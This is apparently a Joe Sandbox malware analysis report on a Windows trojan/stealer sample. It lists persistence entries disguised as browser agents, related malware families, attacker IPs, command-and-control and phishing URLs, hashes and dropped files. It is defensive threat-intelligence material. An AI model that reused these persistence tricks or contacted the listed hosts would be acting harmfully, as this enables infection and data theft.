192.186.7.211	unknown	United States	395776	FEDERAL-ONLINE-GROUP-LLCUS	false

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1367445
Start date and time:	2023-12-27 18:11:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	47
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	uVQLD8YVk6.exe renamed because original name is a hash value
Original Sample Name:	c833507635537e50f5e884eb8242fea0.exe
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.expl.evad.winEXE@77/432@11/19
EGA Information:	Successful, ratio: 76.9%
HCA Information:	Successful, ratio: 95% Number of executed functions: 159 Number of non-executed functions: 296
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, consent.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.126.29.7, 40.126.29.6, 40.126.29.11, 40.126.29.14, 40.126.29.9, 40.126.29.13, 40.126.29.15, 20.190.157.11, 20.189.173.22
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target 780F.exe, PID 8040 because it is empty
Execution Graph export aborted for target InstallSetup8.exe, PID 8092 because there are no executed function
Execution Graph export aborted for target etopt.exe, PID 5220 because there are no executed function
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:12:17	Task Scheduler	Run new task: Firefox Default Browser Agent 67362E45D27DC6F2 path: C:\Users\user\AppData\Roaming\srvwauv
17:13:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Service Scheduler "C:\ProgramData\xQfUeydaBrjuHptx.exe"
17:13:17	Task Scheduler	Run new task: Firefox Default Browser Agent C729D405D28C5CD0 path: C:\Users\user\AppData\Roaming\hivwauv
17:13:21	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Service Scheduler "C:\ProgramData\xQfUeydaBrjuHptx.exe"
17:13:38	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
17:14:00	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run F38F C:\Users\user\AppData\Local\Temp\F38F.exe
17:14:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run F38F C:\Users\user\AppData\Local\Temp\F38F.exe
18:12:01	API Interceptor	20757x Sleep call for process: explorer.exe modified
18:12:20	API Interceptor	1x Sleep call for process: 4854.exe modified
18:12:37	API Interceptor	7x Sleep call for process: RegAsm.exe modified
18:12:39	API Interceptor	6x Sleep call for process: 31839b57a4f11171d6abc8bbc4451ee4.exe modified
18:12:40	API Interceptor	1x Sleep call for process: 928F.exe modified
18:12:47	API Interceptor	16x Sleep call for process: RegSvcs.exe modified
18:13:28	API Interceptor	39x Sleep call for process: 33A6.exe modified
18:13:30	API Interceptor	32x Sleep call for process: CFAA.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.92.254.7	W73PCbSH71.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader	Browse	91.92.254.7/scripts/plus.php?ip=212.102.41.2&substr=eight&s=ab
	7uu2Bn48.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=eight&s=ab
	SSmamWOS7L.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	xksYucKYRR.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Stealc, Vidar	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	PxYYzLeAPi.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	ACTCsxhga8.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	hyLlq17U4C.exe	Get hash	malicious	Stealc, Vidar	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	7pm0Cc79.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=eight&s=ab
	aif31Spjyi.exe	Get hash	malicious	Glupteba, SmokeLoader	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	zzfenRCj9M.exe	Get hash	malicious	Glupteba, SmokeLoader	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	o9B7y2ZGmy.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, Vidar	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=eight&s=ab
	uetfu6ZLWZ.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Stealc	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	1OChQfMJUK.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc, Vidar	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	16GAuqLUFK.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Stealc	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	SecuriteInfo.com.Win64.PWSX-gen.7949.23910.exe	Get hash	malicious	Glupteba	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=two&s=ab
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=three&s=ab
	file.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Socks5Systemz	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=three&s=ab
	U1MiP25NrU.exe	Get hash	malicious	Amadey, Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Vidar	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=eight&s=ab
	7C3J00l6fa.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	8RYB9RzQA5.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s3-w.us-east-1.amazonaws.com	W73PCbSH71.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader	Browse	52.217.163.105
	https://2fa.com-token-auth.com/XUWt4dVMzUjJiV3Q1ZGxkaFMyRmpjbU4yTHpNMkwxUTFSMEZ0YzJ4UWF6WXZRVlZXUW1KQ2FYZzBhalZFWTBVNGFGaEJjR3R0Y1ZCSEsySkViVzk0TUZsWE9IZE1UR1pOTUhST2NTOHJSM0V2VWpOVVNWUnlVRmcxTUZsa1NXcFpOVlZLUWxkVVdrUnRhbk5tVldOYWJtUnhkbXBvUjJoamVtdHdTVTR2Wm1ndlR6TlhNVmR6ZFRBdlRrVnJRV0V4UldsM04yRXlkRFpaV25sbFRFOHJRVTFsZFdsRFFYWTRNMWRuTmtSSVRtVjVNamh2UkdwRFZ6ZG1NbU5aUlNzckxTMTNjVFUxYzI5NWJtNUROa3BUTHpWMVQwTnBiVWxCUFQwPS0tNDMyMGM0Nzc0MmFjMDdlNmJjZTY4NGM4YzcyZTJhYzY4MmEyMWFmNg==?cid=1855985826	Get hash	malicious	Unknown	Browse	52.217.233.25
	7uu2Bn48.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	3.5.3.112
	7pm0Cc79.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	54.231.130.33
	o9B7y2ZGmy.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, Vidar	Browse	52.217.164.41
	SecuriteInfo.com.Win64.PWSX-gen.7949.23910.exe	Get hash	malicious	Glupteba	Browse	52.217.48.60
	5kE9Ks1Yp0.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	16.182.69.73
	MdK7YlTyhS.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	3.5.28.135
	https://pub-2dc4e3b2817c45f8af7172240c8fb675.r2.dev/newweb.html#nobody@fuckoff.org	Get hash	malicious	Unknown	Browse	54.231.170.65
	fY2HAd4r9I.exe	Get hash	malicious	Amadey, Easy Stealer, LummaC Stealer, RHADAMANTHYS, RedLine, SmokeLoader, zgRAT	Browse	52.216.41.25
	file.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Socks5Systemz	Browse	52.217.73.244
	https://www.joesandbox.com/analysis/1366229	Get hash	malicious	Unknown	Browse	52.217.197.33
	ABHRDIL8cm.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	16.182.99.153
	qmJ59GSETt.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	16.182.37.105
	Xu9HaBSiIJ.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	52.217.224.193
	QGShkK4MMl.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Vidar, zgRAT	Browse	52.217.171.65
	sEWX47oH4X.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	3.5.19.145
	zXGs3AGQSn.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	52.217.229.17
	0dzdkSIbp0.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	52.216.90.20
	NFcNdFBTH9.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	54.231.236.201
bitbucket.org	W73PCbSH71.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader	Browse	104.192.141.1
	7uu2Bn48.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	104.192.141.1
	7pm0Cc79.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	104.192.141.1
	o9B7y2ZGmy.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, Vidar	Browse	104.192.141.1
	SecuriteInfo.com.Win64.PWSX-gen.7949.23910.exe	Get hash	malicious	Glupteba	Browse	104.192.141.1
	5kE9Ks1Yp0.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	MdK7YlTyhS.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	fY2HAd4r9I.exe	Get hash	malicious	Amadey, Easy Stealer, LummaC Stealer, RHADAMANTHYS, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	file.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Socks5Systemz	Browse	104.192.141.1
	ABHRDIL8cm.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	qmJ59GSETt.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	Xu9HaBSiIJ.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	QGShkK4MMl.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Vidar, zgRAT	Browse	104.192.141.1
	sEWX47oH4X.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	zXGs3AGQSn.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	0dzdkSIbp0.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	NFcNdFBTH9.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	1vZX9U5Diw.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Vidar, zgRAT	Browse	104.192.141.1
	QrHAH5Dt6l.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	zFZmNLWVfM.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COGENT-174US	W73PCbSH71.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader	Browse	38.6.193.13
	rDQnhb6OBJ.elf	Get hash	malicious	Mirai	Browse	165.254.178.107
	a3SIMycc8C.elf	Get hash	malicious	Mirai	Browse	149.18.254.190
	Iuu2a225Uj.elf	Get hash	malicious	Mirai	Browse	38.211.154.2
	Qz1eqieY1T.elf	Get hash	malicious	Mirai	Browse	154.25.231.55
	D1G7HClTXp.elf	Get hash	malicious	Mirai	Browse	38.151.83.117
	7uu2Bn48.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	38.6.193.13
	pwHXnV4Shx.elf	Get hash	malicious	Mirai	Browse	38.148.251.39
	SSmamWOS7L.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	154.49.142.217
	VOD5Th43fb.elf	Get hash	malicious	Mirai	Browse	38.227.136.233
	D9UijsgjDB.elf	Get hash	malicious	Mirai	Browse	130.117.87.164
	7pm0Cc79.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	38.6.193.13
	https://dyhuitong.com/	Get hash	malicious	Unknown	Browse	206.119.160.227
	https://swmtiaoji.com/	Get hash	malicious	Unknown	Browse	206.119.160.227
	https://jyfenglian.com/	Get hash	malicious	Unknown	Browse	206.119.160.227
	https://sdktiaoji.com/	Get hash	malicious	Unknown	Browse	206.119.160.227
	https://yqifl.com/	Get hash	malicious	Unknown	Browse	206.119.160.227
	1B8943B2CCEA3EE9E464B5865711DB721BAE33CA03646.exe	Get hash	malicious	BazaLoader, SmokeLoader	Browse	50.7.154.218
	https://yinghuodnf.com/	Get hash	malicious	Unknown	Browse	206.119.160.45
	https://szdaoshui.com/	Get hash	malicious	Unknown	Browse	206.119.160.45
THEZONEBG	W73PCbSH71.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader	Browse	91.92.250.73
	1RS8d3yXB1.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Stealc	Browse	91.92.254.7
	Dekont_00924889_pdf.exe	Get hash	malicious	Remcos	Browse	91.92.252.36
	dekont_0092488_pdf.exe	Get hash	malicious	Remcos	Browse	91.92.252.36
	MEXTRAXT.exe	Get hash	malicious	RisePro Stealer, SmokeLoader	Browse	91.92.249.253
	7uu2Bn48.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	91.92.254.7
	SSmamWOS7L.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	91.92.254.7
	SecuriteInfo.com.Trojan.DownLoader46.44277.27482.3211.exe	Get hash	malicious	Snake Keylogger	Browse	91.92.253.149
	xksYucKYRR.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Stealc, Vidar	Browse	91.92.254.7
	SecuriteInfo.com.Win32.CrypterX-gen.26527.9245.exe	Get hash	malicious	Snake Keylogger	Browse	91.92.253.149
	PxYYzLeAPi.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	91.92.254.7
	SecuriteInfo.com.Win32.CrypterX-gen.28912.11851.exe	Get hash	malicious	Snake Keylogger	Browse	91.92.253.149
	ACTCsxhga8.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	91.92.254.7
	file.bat	Get hash	malicious	Remcos	Browse	91.92.244.118
	hyLlq17U4C.exe	Get hash	malicious	Stealc, Vidar	Browse	91.92.254.7
	7pm0Cc79.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	91.92.254.7
	SecuriteInfo.com.Trojan.DownLoader46.44014.21306.18900.exe	Get hash	malicious	Snake Keylogger	Browse	91.92.253.149
	Max.exe	Get hash	malicious	Snake Keylogger	Browse	91.92.253.149
	aif31Spjyi.exe	Get hash	malicious	Glupteba, SmokeLoader	Browse	91.92.254.7
	SecuriteInfo.com.Win32.TrojanX-gen.20502.12077.exe	Get hash	malicious	Snake Keylogger	Browse	91.92.253.149

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	W73PCbSH71.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader	Browse	194.15.112.248
	b7ThScyoHi.exe	Get hash	malicious	RisePro Stealer, SmokeLoader, Vidar	Browse	194.15.112.248
	PEeR32pvuF.exe	Get hash	malicious	RisePro Stealer, SmokeLoader, Vidar	Browse	194.15.112.248
	support.client.exe	Get hash	malicious	ScreenConnect Tool	Browse	194.15.112.248
	support.client.exe	Get hash	malicious	ScreenConnect Tool	Browse	194.15.112.248
	http://docusigningonlines.com	Get hash	malicious	Unknown	Browse	194.15.112.248
	z47orderdetails.scr.exe	Get hash	malicious	AgentTesla	Browse	194.15.112.248
	hesaphareketi-01.exe	Get hash	malicious	AgentTesla	Browse	194.15.112.248
	paymentconfirmation.js	Get hash	malicious	Redline Clipper	Browse	194.15.112.248
	SecuriteInfo.com.W32.MSIL_Agent.FPI.gen.Eldorado.20244.18739.exe	Get hash	malicious	AgentTesla	Browse	194.15.112.248
	XAmen.exe	Get hash	malicious	LummaC Stealer, RisePro Stealer, SmokeLoader, Vidar	Browse	194.15.112.248
	2WEXTRACT.exe	Get hash	malicious	LummaC Stealer, RisePro Stealer, Vidar	Browse	194.15.112.248
	WEXTRACTMUI.exe	Get hash	malicious	LummaC Stealer, RisePro Stealer, SmokeLoader, Vidar	Browse	194.15.112.248
	WEXCAMP.exe	Get hash	malicious	RisePro Stealer, SmokeLoader, Vidar	Browse	194.15.112.248
	Sr1OM60.exe	Get hash	malicious	LummaC Stealer, RisePro Stealer, Vidar	Browse	194.15.112.248
	4qL162Qw.exe	Get hash	malicious	RisePro Stealer, Vidar	Browse	194.15.112.248
	OWFeE6so6J.exe	Get hash	malicious	LummaC Stealer, RisePro Stealer, SmokeLoader, Vidar	Browse	194.15.112.248
	AMkfyTg5.posh.ps1	Get hash	malicious	PoshC2	Browse	194.15.112.248
	file.exe	Get hash	malicious	RisePro Stealer, Vidar	Browse	194.15.112.248
	9brygU3i8g.exe	Get hash	malicious	LummaC Stealer, RisePro Stealer, SmokeLoader, Vidar	Browse	194.15.112.248
a0e9f5d64349fb13191bc781f81f42e1	W73PCbSH71.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	lumma.exe	Get hash	malicious	LummaC	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	lumma.exe	Get hash	malicious	LummaC	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	NumeroLetras.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	171223KB.XLS.xls	Get hash	malicious	Unknown	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	Comprobante_Estado_de_cuenta.xll	Get hash	malicious	Unknown	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	Comprobante_Estado_de_cuenta.xll	Get hash	malicious	Unknown	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	BOB_CBR_TRICHUR_WBS_24_12_2023_NCR.xls	Get hash	malicious	Unknown	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	Comprobante_Estado_de_cuenta.xll	Get hash	malicious	Unknown	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	Comprobante_Estado_de_cuenta.xll	Get hash	malicious	Unknown	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	paymentconfirmation.js	Get hash	malicious	Redline Clipper	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	8lynidCsWe.js	Get hash	malicious	Unknown	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	8lynidCsWe.js	Get hash	malicious	Unknown	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	7yCti1JQXn.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	EdRzQIfoXb.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	https://r20.rs6.net/tn.jsp?f=001jloHWYAhHNmCmWvayL4klv9PwGGF938U3ON9px-oIbc2ETlJxfTUHM45TqM29-UWt4U--hsrGLdA1CkSe2Eq6CNI1Uy-Q5tvOI6Eep2pbMlspo_Q_iI7SNfpd-Bo46TXi01wE_Pi2lems9kLlRyX6Vyy_6_pB_M7Mxj-iBRV1SzkCpR9dE4aLWJNDvTQ0Y3bF58XxZd8-BNbVl3sWVYAoyo90ByYKtK0&c=&ch=&__=/asdf/ulyana.desiderio@maryland.gov	Get hash	malicious	Unknown	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	7uu2Bn48.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	Setup.exe	Get hash	malicious	Unknown	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	xksYucKYRR.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Stealc, Vidar	Browse	104.21.64.47 54.231.140.225 104.192.141.1
	ALL-20230526.xlsx	Get hash	malicious	Unknown	Browse	104.21.64.47 54.231.140.225 104.192.141.1

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\ClocX\ClocX.exe	W73PCbSH71.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader	Browse
	7uu2Bn48.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse
	7pm0Cc79.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse
	o9B7y2ZGmy.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, Vidar	Browse
	SecuriteInfo.com.Win64.PWSX-gen.7949.23910.exe	Get hash	malicious	Glupteba	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	7zrLU5V186.exe	Get hash	malicious	Glupteba, Neoreklami, Stealc, Vidar	Browse
	SecuriteInfo.com.Win64.PWSX-gen.2315.32186.exe	Get hash	malicious	SmokeLoader, Stealc, Vidar	Browse
	XKpsAUCtnp.exe	Get hash	malicious	Glupteba, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Socks5Systemz	Browse
	etopt.exe	Get hash	malicious	Unknown	Browse
	U1MiP25NrU.exe	Get hash	malicious	Amadey, Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Vidar	Browse
	OYSVIdqcxa.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse
	2OcriJkWk6.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse
	newrock.exe	Get hash	malicious	Glupteba, SmokeLoader	Browse
	lPUOqVqw1D.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse
	OE9ZntaKqM.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse
	Z0m3hA5H5V.exe	Get hash	malicious	Glupteba, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	WrB1gNS1fN.exe	Get hash	malicious	HTMLPhisher, Glupteba, Petite Virus, onlyLogger	Browse

Created / dropped Files

C:\Program Files (x86)\360\360Safe\deepscan\speedmem2.hg

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3008011, page size 1024, file counter 543, database pages 107, 1st free page 81, free pages 2, cookie 0x12, schema 4, UTF-16 little endian, version-valid-for 543
Category:	dropped
Size (bytes):	109568
Entropy (8bit):	4.183017359664202
Encrypted:	false
SSDEEP:	768:Jb7b7gKrgFIA2cNt2hLnKzBFTQnQoRtn4+bszpqQgQdDWe7pdDWevd5ZtTnY0/1i:oIFCQnQo7ySQx9pxrzfYaY
MD5:	B4FAAAC062985E6AA24A795679D964F4
SHA1:	940C1E5F05F9EEF6E311342327B93642C917B10E
SHA-256:	5FC29D926B69583E7A442F5569E880618F254E052B26EF7E9CEF3D9D6489EABE
SHA-512:	E098B270CD7BFC38F17B965E31BA2C35FA1F5E8951994781C1B15EB944D57129D0F3B4860C1959BDA523EDB239AC525EA80E742ADCCD4AF10C42FEAE5C80C87B
Malicious:	false
Preview:	SQLite format 3......@ .......k...Q.............................................................-...............................z..!1...-i.n.d.e.x.N.P.1._.I.D.X._.1.N.P.1..C.R.E.A.T.E. .U.N.I.Q.U.E. .I.N.D.E.X. .N.P.1._.I.D.X._.1. .O.N. .N.P.1.(.N.D.).. ..!.....t.a.b.l.e.N.P.1.N.P.1..C.R.E.A.T.E. .T.A.B.L.E. .N.P.1.(.N.D. .s.q.l.i.t.e.3._.i.n.t.6.4.,. .N.M.D. .B.L.O.B.,. .S.H.A. .B.L.O.B.,. .T.S. .I.N.T.E.G.E.R.,. .D.T. .I.N.T.E.G.E.R.,. .F.G. .I.N.T.E.G.E.R.,. .F.D. .C.H.A.R.,. .M.W. .C.H.A.R.,. .S.C. .C.H.A.R.,. .V.R. .I.N.T.E.G.E.R.).r..!-...%i.n.d.e.x.F.L._.I.D.X._.1.F.L..C.R.E.A.T.E. .U.N.I.Q.U.E. .I.N.D.E.X. .F.L._.I.D.X._.1. .O.N. .F.L.(.F.N.)..$..!....!t.a.b.l.e.F.L.F.L..C.R.E.A.T.E. .T.A.B.L.E. .F.L.(.F.N. .s.q.l.i.t.e.3._.i.n.t.6.4.,. .A.C. .I.N.T.E.G.E.R.,. .F.G. .I.N.T.E.G.E.R.,. .V.R. .I.N.T.E.G.E.R.)..B..!....]t.a.b.l.e.V.I.V.I..C.R.E.A.T.E. .T.A.B.L.E. .V.I.(.C.V. .C.H.A.R.,. .O.V. .C.H.A.R.,. .U.V. 